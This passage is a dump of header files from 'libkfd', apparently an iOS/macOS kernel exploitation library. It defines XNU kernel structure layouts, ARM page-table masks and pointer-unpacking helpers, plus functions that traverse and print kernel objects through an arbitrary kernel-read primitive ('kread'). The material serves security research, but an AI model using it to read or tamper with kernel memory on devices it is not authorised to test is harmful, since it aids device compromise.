| u64 vst_ino; 72 | u32 vst_uid; 73 | u32 vst_gid; 74 | i64 vst_atime; 75 | i64 vst_atimensec; 76 | i64 vst_mtime; 77 | i64 vst_mtimensec; 78 | i64 vst_ctime; 79 | i64 vst_ctimensec; 80 | i64 vst_birthtime; 81 | i64 vst_birthtimensec; 82 | i64 vst_size; 83 | i64 vst_blocks; 84 | i32 vst_blksize; 85 | u32 vst_flags; 86 | u32 vst_gen; 87 | u32 vst_rdev; 88 | i64 vst_qspare[2]; 89 | }; 90 | 91 | #define PROC_PIDFDVNODEINFO 1 92 | #define PROC_PIDFDVNODEPATHINFO 2 93 | #define PROC_PIDFDSOCKETINFO 3 94 | #define PROC_PIDFDPSEMINFO 4 95 | #define PROC_PIDFDPSHMINFO 5 96 | #define PROC_PIDFDPIPEINFO 6 97 | #define PROC_PIDFDKQUEUEINFO 7 98 | #define PROC_PIDFDATALKINFO 8 99 | #define PROC_PIDFDKQUEUE_EXTINFO 9 100 | #define PROC_PIDFDCHANNELINFO 10 101 | 102 | struct proc_fileinfo { 103 | u32 fi_openflags; 104 | u32 fi_status; 105 | i64 fi_offset; 106 | i32 fi_type; 107 | u32 fi_guardflags; 108 | }; 109 | 110 | struct psem_info { 111 | struct vinfo_stat psem_stat; 112 | char psem_name[1024]; 113 | }; 114 | 115 | struct psem_fdinfo { 116 | struct proc_fileinfo pfi; 117 | struct psem_info pseminfo; 118 | }; 119 | 120 | #define PROC_PIDDYNKQUEUE_INFO 0 121 | #define PROC_PIDDYNKQUEUE_EXTINFO 1 122 | 123 | struct kqueue_info { 124 | struct vinfo_stat kq_stat; 125 | u32 kq_state; 126 | u32 rfu_1; 127 | }; 128 | 129 | struct kqueue_dyninfo { 130 | struct kqueue_info kqdi_info; 131 | u64 kqdi_servicer; 132 | u64 kqdi_owner; 133 | u32 kqdi_sync_waiters; 134 | u8 kqdi_sync_waiter_qos; 135 | u8 kqdi_async_qos; 136 | u16 kqdi_request_state; 137 | u8 kqdi_events_qos; 138 | u8 kqdi_pri; 139 | u8 kqdi_pol; 140 | u8 kqdi_cpupercent; 141 | u8 _kqdi_reserved0[4]; 142 | u64 _kqdi_reserved1[4]; 143 | }; 144 | 145 | /* 146 | * perfmon stuff 147 | */ 148 | 149 | #define PERFMON_SPEC_MAX_ATTR_COUNT (32) 150 | 151 | struct perfmon_layout { 152 | u16 pl_counter_count; 153 | u16 pl_fixed_offset; 154 | u16 pl_fixed_count; 155 | u16 pl_unit_count; 156 | u16 pl_reg_count; 157 | u16 pl_attr_count; 158 | }; 159 | 160 | typedef char perfmon_name_t[16]; 161 | 162 | struct perfmon_event { 163 | char pe_name[32]; 164 | u64 pe_number; 165 | u16 pe_counter; 166 | }; 167 | 168 | struct perfmon_attr { 169 | perfmon_name_t pa_name; 170 | u64 pa_value; 171 | }; 172 | 173 | struct perfmon_spec { 174 | struct perfmon_event* ps_events; 175 | struct perfmon_attr* ps_attrs; 176 | u16 ps_event_count; 177 | u16 ps_attr_count; 178 | }; 179 | 180 | enum perfmon_kind { 181 | perfmon_cpmu, 182 | perfmon_upmu, 183 | perfmon_kind_max, 184 | }; 185 | 186 | struct perfmon_source { 187 | const char* ps_name; 188 | const perfmon_name_t* ps_register_names; 189 | const perfmon_name_t* ps_attribute_names; 190 | struct perfmon_layout ps_layout; 191 | enum perfmon_kind ps_kind; 192 | bool ps_supported; 193 | }; 194 | 195 | struct perfmon_counter { 196 | u64 pc_number; 197 | }; 198 | 199 | struct perfmon_config { 200 | struct perfmon_source* pc_source; 201 | struct perfmon_spec pc_spec; 202 | u16 pc_attr_ids[PERFMON_SPEC_MAX_ATTR_COUNT]; 203 | struct perfmon_counter* pc_counters; 204 | u64 pc_counters_used; 205 | u64 pc_attrs_used; 206 | bool pc_configured:1; 207 | }; 208 | 209 | struct perfmon_device { 210 | void* pmdv_copyout_buf; 211 | u64 pmdv_mutex[2]; 212 | struct perfmon_config* pmdv_config; 213 | bool pmdv_allocated; 214 | }; 215 | 216 | enum perfmon_ioctl { 217 | PERFMON_CTL_ADD_EVENT = _IOWR('P', 5, struct perfmon_event), 218 | PERFMON_CTL_SPECIFY = _IOWR('P', 10, struct perfmon_spec), 219 | }; 220 | 221 | /* 222 | * pmap stuff 223 | */ 224 | 225 | #define AP_RWNA (0x0ull << 6) 226 | #define AP_RWRW (0x1ull << 6) 227 | #define AP_RONA (0x2ull << 6) 228 | #define AP_RORO (0x3ull << 6) 229 | 230 | #define ARM_PTE_TYPE 0x0000000000000003ull 231 | #define ARM_PTE_TYPE_VALID 0x0000000000000003ull 232 | #define ARM_PTE_TYPE_MASK 0x0000000000000002ull 233 | #define ARM_TTE_TYPE_L3BLOCK 0x0000000000000002ull 234 | #define ARM_PTE_ATTRINDX 0x000000000000001cull 235 | #define ARM_PTE_NS 0x0000000000000020ull 236 | #define ARM_PTE_AP 0x00000000000000c0ull 237 | #define ARM_PTE_SH 0x0000000000000300ull 238 | #define ARM_PTE_AF 0x0000000000000400ull 239 | #define ARM_PTE_NG 0x0000000000000800ull 240 | #define ARM_PTE_ZERO1 0x000f000000000000ull 241 | #define ARM_PTE_HINT 0x0010000000000000ull 242 | #define ARM_PTE_PNX 0x0020000000000000ull 243 | #define ARM_PTE_NX 0x0040000000000000ull 244 | #define ARM_PTE_ZERO2 0x0380000000000000ull 245 | #define ARM_PTE_WIRED 0x0400000000000000ull 246 | #define ARM_PTE_WRITEABLE 0x0800000000000000ull 247 | #define ARM_PTE_ZERO3 0x3000000000000000ull 248 | #define ARM_PTE_COMPRESSED_ALT 0x4000000000000000ull 249 | #define ARM_PTE_COMPRESSED 0x8000000000000000ull 250 | 251 | #define ARM_TTE_VALID 0x0000000000000001ull 252 | #define ARM_TTE_TYPE_MASK 0x0000000000000002ull 253 | #define ARM_TTE_TYPE_TABLE 0x0000000000000002ull 254 | #define ARM_TTE_TYPE_BLOCK 0x0000000000000000ull 255 | #define ARM_TTE_TABLE_MASK 0x0000fffffffff000ull 256 | #define ARM_TTE_PA_MASK 0x0000fffffffff000ull 257 | 258 | #define PMAP_TT_L0_LEVEL 0x0 259 | #define PMAP_TT_L1_LEVEL 0x1 260 | #define PMAP_TT_L2_LEVEL 0x2 261 | #define PMAP_TT_L3_LEVEL 0x3 262 | 263 | #define ARM_16K_TT_L0_SIZE 0x0000800000000000ull 264 | #define ARM_16K_TT_L0_OFFMASK 0x00007fffffffffffull 265 | #define ARM_16K_TT_L0_SHIFT 47 266 | #define ARM_16K_TT_L0_INDEX_MASK 0x0000800000000000ull 267 | 268 | #define ARM_16K_TT_L1_SIZE 0x0000001000000000ull 269 | #define ARM_16K_TT_L1_OFFMASK 0x0000000fffffffffull 270 | #define ARM_16K_TT_L1_SHIFT 36 271 | #define ARM_16K_TT_L1_INDEX_MASK 0x00007ff000000000ull 272 | 273 | #define ARM_16K_TT_L2_SIZE 0x0000000002000000ull 274 | #define ARM_16K_TT_L2_OFFMASK 0x0000000001ffffffull 275 | #define ARM_16K_TT_L2_SHIFT 25 276 | #define ARM_16K_TT_L2_INDEX_MASK 0x0000000ffe000000ull 277 | 278 | #define ARM_16K_TT_L3_SIZE 0x0000000000004000ull 279 | #define ARM_16K_TT_L3_OFFMASK 0x0000000000003fffull 280 | #define ARM_16K_TT_L3_SHIFT 14 281 | #define ARM_16K_TT_L3_INDEX_MASK 0x0000000001ffc000ull 282 | 283 | #endif /* miscellaneous_types_h */ 284 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/pmap.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef pmap_h 6 | #define pmap_h 7 | 8 | struct pmap { 9 | u64 tte; 10 | u64 ttep; 11 | u64 min; 12 | u64 max; 13 | u64 pmap_pt_attr; 14 | u64 ledger; 15 | u64 rwlock[2]; 16 | struct { 17 | u64 next; 18 | u64 prev; 19 | } pmaps; 20 | u64 tt_entry_free; 21 | u64 nested_pmap; 22 | u64 nested_region_addr; 23 | u64 nested_region_size; 24 | u64 nested_region_true_start; 25 | u64 nested_region_true_end; 26 | u64 nested_region_asid_bitmap; 27 | u32 nested_region_asid_bitmap_size; 28 | u64 reserved0; 29 | u64 reserved1; 30 | u64 reserved2; 31 | u64 reserved3; 32 | i32 ref_count; 33 | i32 nested_count; 34 | u32 nested_no_bounds_refcnt; 35 | u16 hw_asid; 36 | u8 sw_asid; 37 | bool reserved4; 38 | bool pmap_vm_map_cs_enforced; 39 | bool reserved5; 40 | u32 reserved6; 41 | u8 reserved7; 42 | u8 type; 43 | bool reserved8; 44 | bool reserved9; 45 | bool is_rosetta; 46 | bool nx_enabled; 47 | bool is_64bit; 48 | bool nested_has_no_bounds_ref; 49 | bool nested_bounds_set; 50 | bool disable_jop; 51 | bool reserved11; 52 | }; 53 | 54 | void print_pmap(struct kfd* kfd, struct pmap* pmap, u64 pmap_kaddr) 55 | { 56 | print_message("struct pmap @ %016llx", pmap_kaddr); 57 | print_x64(pmap->tte); 58 | print_x64(pmap->ttep); 59 | print_x64(pmap->min); 60 | print_x64(pmap->max); 61 | print_x64(pmap->pmap_pt_attr); 62 | print_x64(pmap->ledger); 63 | print_x64(pmap->rwlock[0]); 64 | print_x64(pmap->rwlock[1]); 65 | print_x64(pmap->pmaps.next); 66 | print_x64(pmap->pmaps.prev); 67 | print_x64(pmap->tt_entry_free); 68 | print_x64(pmap->nested_pmap); 69 | print_x64(pmap->nested_region_addr); 70 | print_x64(pmap->nested_region_size); 71 | print_x64(pmap->nested_region_true_start); 72 | print_x64(pmap->nested_region_true_end); 73 | print_x64(pmap->nested_region_asid_bitmap); 74 | print_x32(pmap->nested_region_asid_bitmap_size); 75 | print_x64(pmap->reserved0); 76 | print_x64(pmap->reserved1); 77 | print_x64(pmap->reserved2); 78 | print_x64(pmap->reserved3); 79 | print_i32(pmap->ref_count); 80 | print_i32(pmap->nested_count); 81 | print_x32(pmap->nested_no_bounds_refcnt); 82 | print_x16(pmap->hw_asid); 83 | print_x8(pmap->sw_asid); 84 | print_bool(pmap->reserved4); 85 | print_bool(pmap->pmap_vm_map_cs_enforced); 86 | print_bool(pmap->reserved5); 87 | print_x32(pmap->reserved6); 88 | print_x32(pmap->reserved7); 89 | print_bool(pmap->reserved8); 90 | print_bool(pmap->reserved9); 91 | print_bool(pmap->is_rosetta); 92 | print_bool(pmap->nx_enabled); 93 | print_bool(pmap->is_64bit); 94 | print_bool(pmap->nested_has_no_bounds_ref); 95 | print_bool(pmap->nested_bounds_set); 96 | print_bool(pmap->disable_jop); 97 | print_bool(pmap->reserved11); 98 | print_x8(pmap->type); 99 | } 100 | 101 | #endif /* pmap_h */ 102 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/pseminfo.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef pseminfo_h 6 | #define pseminfo_h 7 | 8 | struct pseminfo { 9 | u32 psem_flags; 10 | u32 psem_usecount; 11 | u16 psem_mode; 12 | u32 psem_uid; 13 | u32 psem_gid; 14 | char psem_name[32]; 15 | u64 psem_semobject; 16 | u64 psem_label; 17 | i32 psem_creator_pid; 18 | u64 psem_creator_uniqueid; 19 | }; 20 | 21 | #endif /* pseminfo_h */ 22 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/psemnode.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef psemnode_h 6 | #define psemnode_h 7 | 8 | struct psemnode { 9 | u64 pinfo; 10 | u64 padding; 11 | }; 12 | 13 | #endif /* psemnode_h */ 14 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/semaphore.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef semaphore_h 6 | #define semaphore_h 7 | 8 | struct semaphore { 9 | struct { 10 | u64 next; 11 | u64 prev; 12 | } task_link; 13 | char waitq[24]; 14 | u64 owner; 15 | u64 port; 16 | u32 ref_count; 17 | i32 count; 18 | }; 19 | 20 | #endif /* semaphore_h */ 21 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/vm_map_copy.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_map_copy_h 6 | #define vm_map_copy_h 7 | 8 | #include "vm_map_entry.h" 9 | 10 | #define cpy_hdr c_u.hdr 11 | #define cpy_object c_u.object 12 | #define cpy_kdata c_u.kdata 13 | 14 | struct rb_head { 15 | u64 rbh_root; 16 | }; 17 | 18 | struct vm_map_header { 19 | struct vm_map_links links; 20 | i32 nentries; 21 | u16 page_shift; 22 | u32 23 | entries_pageable:1, 24 | __padding:15; 25 | struct rb_head rb_head_store; 26 | }; 27 | 28 | struct vm_map_copy { 29 | i32 type; 30 | u64 offset; 31 | u64 size; 32 | union { 33 | struct vm_map_header hdr; 34 | u64 object; 35 | u64 kdata; 36 | } c_u; 37 | }; 38 | 39 | void print_vm_map_copy(struct kfd* kfd, struct vm_map_copy* copy, u64 copy_kaddr) 40 | { 41 | print_message("struct vm_map_copy @ %016llx", copy_kaddr); 42 | print_i32(copy->type); 43 | print_x64(copy->offset); 44 | print_x64(copy->size); 45 | print_x64(copy->cpy_hdr.links.prev); 46 | print_x64(copy->cpy_hdr.links.next); 47 | print_x64(copy->cpy_hdr.links.start); 48 | print_x64(copy->cpy_hdr.links.end); 49 | print_i32(copy->cpy_hdr.nentries); 50 | print_u16(copy->cpy_hdr.page_shift); 51 | print_bool(copy->cpy_hdr.entries_pageable); 52 | print_x64(copy->cpy_hdr.rb_head_store.rbh_root); 53 | 54 | if (copy->type == 1) { 55 | u64 entry_kaddr = copy->cpy_hdr.links.next; 56 | u64 copy_entry_kaddr = copy_kaddr + offsetof(struct vm_map_copy, cpy_hdr.links.prev); 57 | struct vm_map_entry entry = {}; 58 | while (entry_kaddr != copy_entry_kaddr) { 59 | kread((u64)(kfd), entry_kaddr, &entry, sizeof(entry)); 60 | print_vm_map_entry(kfd, &entry, entry_kaddr); 61 | entry_kaddr = entry.vme_next; 62 | } 63 | } 64 | } 65 | 66 | #endif /* vm_map_copy_h */ 67 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/vm_map_entry.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_map_entry_h 6 | #define vm_map_entry_h 7 | 8 | #include "vm_object.h" 9 | 10 | #define vme_prev links.prev 11 | #define vme_next links.next 12 | #define vme_start links.start 13 | #define vme_end links.end 14 | 15 | struct vm_map_links { 16 | u64 prev; 17 | u64 next; 18 | u64 start; 19 | u64 end; 20 | }; 21 | 22 | struct vm_map_store { 23 | struct { 24 | u64 rbe_left; 25 | u64 rbe_right; 26 | u64 rbe_parent; 27 | } entry; 28 | }; 29 | 30 | struct vm_map_entry { 31 | struct vm_map_links links; 32 | struct vm_map_store store; 33 | union { 34 | u64 vme_object_value; 35 | struct { 36 | u64 vme_atomic:1; 37 | u64 is_sub_map:1; 38 | u64 vme_submap:60; 39 | }; 40 | struct { 41 | u32 vme_ctx_atomic:1; 42 | u32 vme_ctx_is_sub_map:1; 43 | u32 vme_context:30; 44 | u32 vme_object; 45 | }; 46 | }; 47 | u64 48 | vme_alias:12, 49 | vme_offset:52, 50 | is_shared:1, 51 | __unused1:1, 52 | in_transition:1, 53 | needs_wakeup:1, 54 | behavior:2, 55 | needs_copy:1, 56 | protection:3, 57 | used_for_tpro:1, 58 | max_protection:4, 59 | inheritance:2, 60 | use_pmap:1, 61 | no_cache:1, 62 | vme_permanent:1, 63 | superpage_size:1, 64 | map_aligned:1, 65 | zero_wired_pages:1, 66 | used_for_jit:1, 67 | pmap_cs_associated:1, 68 | iokit_acct:1, 69 | vme_resilient_codesign:1, 70 | vme_resilient_media:1, 71 | __unused2:1, 72 | vme_no_copy_on_read:1, 73 | translated_allow_execute:1, 74 | vme_kernel_object:1; 75 | u16 wired_count; 76 | u16 user_wired_count; 77 | }; 78 | 79 | #define vme_for_store(kaddr) ((kaddr) ? (((kaddr) - sizeof(struct vm_map_links)) & (~1ull)) : (kaddr)) 80 | #define store_for_vme(kaddr) ((kaddr) ? (((kaddr) + sizeof(struct vm_map_links))) : (kaddr)) 81 | 82 | static inline u64 VME_SUBMAP(struct vm_map_entry* entry) 83 | { 84 | assert(entry->is_sub_map); 85 | u64 submap_kaddr = (entry->vme_submap << 2) | 0xf000000000000000; 86 | return submap_kaddr; 87 | } 88 | 89 | static inline u64 VME_OBJECT(struct vm_map_entry* entry) 90 | { 91 | assert(!entry->is_sub_map); 92 | assert(!entry->vme_kernel_object); 93 | u64 object_kaddr = VM_OBJECT_UNPACK(entry->vme_object); 94 | return object_kaddr; 95 | } 96 | 97 | static inline u64 VME_OFFSET(struct vm_map_entry* entry) 98 | { 99 | return entry->vme_offset << 12; 100 | } 101 | 102 | void print_vm_map_entry(struct kfd* kfd, struct vm_map_entry* entry, u64 entry_kaddr) 103 | { 104 | print_message("struct vm_map_entry @ %016llx", entry_kaddr); 105 | print_x64(entry->vme_prev); 106 | print_x64(entry->vme_next); 107 | print_x64(entry->vme_start); 108 | print_x64(entry->vme_end); 109 | print_x64(entry->store.entry.rbe_left); 110 | print_x64(entry->store.entry.rbe_right); 111 | print_x64(entry->store.entry.rbe_parent); 112 | print_bool(entry->is_sub_map); 113 | 114 | u64 object_kaddr = 0; 115 | if (!entry->is_sub_map) { 116 | object_kaddr = VME_OBJECT(entry); 117 | print_x64(VME_OBJECT(entry)); 118 | print_x64(VME_OFFSET(entry)); 119 | } 120 | 121 | print_i32(entry->vme_alias); 122 | print_bool(entry->is_shared); 123 | print_bool(entry->in_transition); 124 | print_bool(entry->needs_wakeup); 125 | print_i32(entry->behavior); 126 | print_bool(entry->needs_copy); 127 | print_i32(entry->protection); 128 | print_bool(entry->used_for_tpro); 129 | print_i32(entry->max_protection); 130 | print_i32(entry->inheritance); 131 | print_bool(entry->use_pmap); 132 | print_bool(entry->no_cache); 133 | print_bool(entry->vme_permanent); 134 | print_bool(entry->superpage_size); 135 | print_bool(entry->map_aligned); 136 | print_bool(entry->zero_wired_pages); 137 | print_bool(entry->used_for_jit); 138 | print_bool(entry->pmap_cs_associated); 139 | print_bool(entry->iokit_acct); 140 | print_bool(entry->vme_resilient_codesign); 141 | print_bool(entry->vme_resilient_media); 142 | print_bool(entry->vme_no_copy_on_read); 143 | print_bool(entry->translated_allow_execute); 144 | print_bool(entry->vme_kernel_object); 145 | print_u16(entry->wired_count); 146 | print_u16(entry->user_wired_count); 147 | 148 | if (object_kaddr) { 149 | struct vm_object object = {}; 150 | kread((u64)(kfd), object_kaddr, &object, sizeof(object)); 151 | print_vm_object(kfd, &object, object_kaddr); 152 | } 153 | } 154 | 155 | #endif /* vm_map_entry_h */ 156 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/vm_named_entry.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_named_entry_h 6 | #define vm_named_entry_h 7 | 8 | struct vm_named_entry { 9 | u64 Lock[2]; 10 | union { 11 | u64 map; 12 | u64 copy; 13 | } backing; 14 | u64 offset; 15 | u64 size; 16 | u64 data_offset; 17 | u32 18 | protection:4, 19 | is_object:1, 20 | internal:1, 21 | is_sub_map:1, 22 | is_copy:1, 23 | is_fully_owned:1; 24 | }; 25 | 26 | void print_vm_named_entry(struct kfd* kfd, struct vm_named_entry* named_entry, u64 named_entry_kaddr) 27 | { 28 | print_message("struct vm_named_entry @ %016llx", named_entry_kaddr); 29 | print_x64(named_entry->backing.copy); 30 | print_x64(named_entry->offset); 31 | print_x64(named_entry->size); 32 | print_x64(named_entry->data_offset); 33 | print_i32(named_entry->protection); 34 | print_bool(named_entry->is_object); 35 | print_bool(named_entry->internal); 36 | print_bool(named_entry->is_sub_map); 37 | print_bool(named_entry->is_copy); 38 | print_bool(named_entry->is_fully_owned); 39 | 40 | if (!named_entry->is_sub_map) { 41 | u64 copy_kaddr = named_entry->backing.copy; 42 | struct vm_map_copy copy = {}; 43 | kread((u64)(kfd), copy_kaddr, ©, sizeof(copy)); 44 | print_vm_map_copy(kfd, ©, copy_kaddr); 45 | } 46 | } 47 | 48 | #endif /* vm_named_entry_h */ 49 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/vm_object.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_object_h 6 | #define vm_object_h 7 | 8 | #include "vm_page.h" 9 | 10 | #define vo_size vo_un1.vou_size 11 | #define vo_cache_pages_to_scan vo_un1.vou_cache_pages_to_scan 12 | #define vo_shadow_offset vo_un2.vou_shadow_offset 13 | #define vo_cache_ts vo_un2.vou_cache_ts 14 | #define vo_owner vo_un2.vou_owner 15 | 16 | struct vm_object { 17 | vm_page_queue_head_t memq; 18 | u64 Lock[2]; 19 | union { 20 | u64 vou_size; 21 | i32 vou_cache_pages_to_scan; 22 | } vo_un1; 23 | u64 memq_hint; 24 | i32 ref_count; 25 | u32 resident_page_count; 26 | u32 wired_page_count; 27 | u32 reusable_page_count; 28 | u64 copy; 29 | u64 shadow; 30 | u64 pager; 31 | union { 32 | u64 vou_shadow_offset; 33 | u64 vou_cache_ts; 34 | u64 vou_owner; 35 | } vo_un2; 36 | u64 paging_offset; 37 | u64 pager_control; 38 | i32 copy_strategy; 39 | u32 40 | paging_in_progress:16, 41 | __object1_unused_bits:16; 42 | u32 activity_in_progress; 43 | u32 44 | all_wanted:11, 45 | pager_created:1, 46 | pager_initialized:1, 47 | pager_ready:1, 48 | pager_trusted:1, 49 | can_persist:1, 50 | internal:1, 51 | private:1, 52 | pageout:1, 53 | alive:1, 54 | purgable:2, 55 | purgeable_only_by_kernel:1, 56 | purgeable_when_ripe:1, 57 | shadowed:1, 58 | true_share:1, 59 | terminating:1, 60 | named:1, 61 | shadow_severed:1, 62 | phys_contiguous:1, 63 | nophyscache:1, 64 | for_realtime:1; 65 | queue_chain_t cached_list; 66 | u64 last_alloc; 67 | u64 cow_hint; 68 | i32 sequential; 69 | u32 pages_created; 70 | u32 pages_used; 71 | u32 72 | wimg_bits:8, 73 | code_signed:1, 74 | transposed:1, 75 | mapping_in_progress:1, 76 | phantom_isssd:1, 77 | volatile_empty:1, 78 | volatile_fault:1, 79 | all_reusable:1, 80 | blocked_access:1, 81 | set_cache_attr:1, 82 | object_is_shared_cache:1, 83 | purgeable_queue_type:2, 84 | purgeable_queue_group:3, 85 | io_tracking:1, 86 | no_tag_update:1, 87 | eligible_for_secluded:1, 88 | can_grab_secluded:1, 89 | __unused_access_tracking:1, 90 | vo_ledger_tag:3, 91 | vo_no_footprint:1; 92 | u8 scan_collisions; 93 | u8 __object4_unused_bits[1]; 94 | u16 wire_tag; 95 | u32 phantom_object_id; 96 | queue_head_t uplq; 97 | queue_chain_t objq; 98 | queue_chain_t task_objq; 99 | }; 100 | 101 | void print_vm_object(struct kfd* kfd, struct vm_object* object, u64 object_kaddr) 102 | { 103 | print_message("struct vm_object @ %016llx", object_kaddr); 104 | print_x64(object->vo_size); 105 | print_i32(object->ref_count); 106 | print_u32(object->resident_page_count); 107 | print_u32(object->wired_page_count); 108 | print_u32(object->reusable_page_count); 109 | print_x64(object->copy); 110 | print_x64(object->shadow); 111 | print_x64(object->pager); 112 | print_x64(object->vo_shadow_offset); 113 | print_x64(object->paging_offset); 114 | print_x64(object->pager_control); 115 | print_i32(object->copy_strategy); 116 | print_u32(object->paging_in_progress); 117 | print_u32(object->activity_in_progress); 118 | print_bool(object->can_persist); 119 | print_bool(object->internal); 120 | print_bool(object->pageout); 121 | print_i32(object->purgable); 122 | print_bool(object->shadowed); 123 | print_bool(object->true_share); 124 | print_bool(object->named); 125 | 126 | if (object->resident_page_count) { 127 | u64 page_kaddr = VM_PAGE_UNPACK_PTR(object->memq.next); 128 | struct vm_page page = {}; 129 | while (page_kaddr != object_kaddr) { 130 | kread((u64)(kfd), page_kaddr, &page, sizeof(page)); 131 | print_vm_page(kfd, &page, page_kaddr); 132 | page_kaddr = VM_PAGE_UNPACK_PTR(page.vmp_listq.next); 133 | } 134 | } 135 | } 136 | 137 | #endif /* vm_object_h */ 138 | -------------------------------------------------------------------------------- /kfd/libkfd/info/static_types/vm_page.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. 3 | */ 4 | 5 | #ifndef vm_page_h 6 | #define vm_page_h 7 | 8 | typedef struct { 9 | u64 next; 10 | u64 prev; 11 | } queue_head_t, queue_chain_t; 12 | 13 | typedef struct { 14 | u32 next; 15 | u32 prev; 16 | } vm_page_queue_head_t, vm_page_queue_chain_t; 17 | 18 | #define vmp_pageq vmp_q_un.vmp_q_pageq 19 | #define vmp_snext vmp_q_un.vmp_q_snext 20 | 21 | struct vm_page { 22 | union { 23 | vm_page_queue_chain_t vmp_q_pageq; 24 | u64 vmp_q_snext; 25 | } vmp_q_un; 26 | vm_page_queue_chain_t vmp_listq; 27 | vm_page_queue_chain_t vmp_specialq; 28 | u64 vmp_offset; 29 | u32 vmp_object; 30 | u32 31 | vmp_wire_count:16, 32 | vmp_q_state:4, 33 | vmp_on_specialq:2, 34 | vmp_gobbled:1, 35 | vmp_laundry:1, 36 | vmp_no_cache:1, 37 | vmp_private:1, 38 | vmp_reference:1, 39 | vmp_lopage:1, 40 | vmp_realtime:1, 41 | vmp_unused_page_bits:3; 42 | u32 vmp_next_m; 43 | u32 44 | vmp_busy:1, 45 | vmp_wanted:1, 46 | vmp_tabled:1, 47 | vmp_hashed:1, 48 | vmp_fictitious:1, 49 | vmp_clustered:1, 50 | vmp_pmapped:1, 51 | vmp_xpmapped:1, 52 | vmp_wpmapped:1, 53 | vmp_free_when_done:1, 54 | vmp_absent:1, 55 | vmp_error:1, 56 | vmp_dirty:1, 57 | vmp_cleaning:1, 58 | vmp_precious:1, 59 | vmp_overwriting:1, 60 | vmp_restart:1, 61 | vmp_unusual:1, 62 | vmp_cs_validated:4, 63 | vmp_cs_tainted:4, 64 | vmp_cs_nx:4, 65 | vmp_reusable:1, 66 | vmp_written_by_kernel:1; 67 | }; 68 | 69 | struct vm_page* vm_pages = 0; 70 | struct vm_page* vm_page_array_beginning_addr = 0; 71 | struct vm_page* vm_page_array_ending_addr = 0; 72 | u32 vm_first_phys_ppnum = 0; 73 | 74 | #define __WORDSIZE 64 75 | 76 | #define TiB(x) ((0ull + (x)) << 40) 77 | #define GiB(x) ((0ull + (x)) << 30) 78 | 79 | #if TARGET_MACOS 80 | #define VM_KERNEL_POINTER_SIGNIFICANT_BITS 41 81 | #define VM_MIN_KERNEL_ADDRESS ((u64)(0ull - TiB(2))) 82 | #else /* TARGET_MACOS */ 83 | #define VM_KERNEL_POINTER_SIGNIFICANT_BITS 38 84 | #define VM_MIN_KERNEL_ADDRESS ((u64)(0ull - GiB(144))) 85 | #endif /* TARGET_MACOS */ 86 | 87 | #define VM_MIN_KERNEL_AND_KEXT_ADDRESS VM_MIN_KERNEL_ADDRESS 88 | 89 | #define VM_PAGE_PACKED_PTR_ALIGNMENT 64 90 | #define VM_PAGE_PACKED_ALIGNED __attribute__((aligned(VM_PAGE_PACKED_PTR_ALIGNMENT))) 91 | #define VM_PAGE_PACKED_PTR_BITS 31 92 | #define VM_PAGE_PACKED_PTR_SHIFT 6 93 | #define VM_PAGE_PACKED_PTR_BASE ((usize)(VM_MIN_KERNEL_AND_KEXT_ADDRESS)) 94 | #define VM_PAGE_PACKED_FROM_ARRAY 0x80000000 95 | 96 | typedef struct vm_packing_params { 97 | u64 vmpp_base; 98 | u8 vmpp_bits; 99 | u8 vmpp_shift; 100 | bool vmpp_base_relative; 101 | } vm_packing_params_t; 102 | 103 | static inline u64 vm_unpack_pointer(u64 packed, vm_packing_params_t params) 104 | { 105 | if (!params.vmpp_base_relative) { 106 | i64 addr = (i64)(packed); 107 | addr <<= __WORDSIZE - params.vmpp_bits; 108 | addr >>= __WORDSIZE - params.vmpp_bits - params.vmpp_shift; 109 | return (u64)(addr); 110 | } 111 | 112 | if (packed) { 113 | return (packed << params.vmpp_shift) + params.vmpp_base; 114 | } 115 | 116 | return (u64)(0); 117 | } 118 | 119 | #define VM_PACKING_IS_BASE_RELATIVE(ns) \ 120 | (ns##_BITS + ns##_SHIFT <= VM_KERNEL_POINTER_SIGNIFICANT_BITS) 121 | 122 | #define VM_PACKING_PARAMS(ns) \ 123 | (vm_packing_params_t) { \ 124 | .vmpp_base = ns##_BASE, \ 125 | .vmpp_bits = ns##_BITS, \ 126 | .vmpp_shift = ns##_SHIFT, \ 127 | .vmpp_base_relative = VM_PACKING_IS_BASE_RELATIVE(ns), \ 128 | } 129 | 130 | #define VM_UNPACK_POINTER(packed, ns) \ 131 | vm_unpack_pointer(packed, VM_PACKING_PARAMS(ns)) 132 | 133 | static inline u64 vm_page_unpack_ptr(u64 packed_page) 134 | { 135 | if (packed_page >= VM_PAGE_PACKED_FROM_ARRAY) { 136 | packed_page &= ~VM_PAGE_PACKED_FROM_ARRAY; 137 | return (u64)(&vm_pages[packed_page]); 138 | } 139 | 140 | return VM_UNPACK_POINTER(packed_page, VM_PAGE_PACKED_PTR); 141 | } 142 | 143 | #define 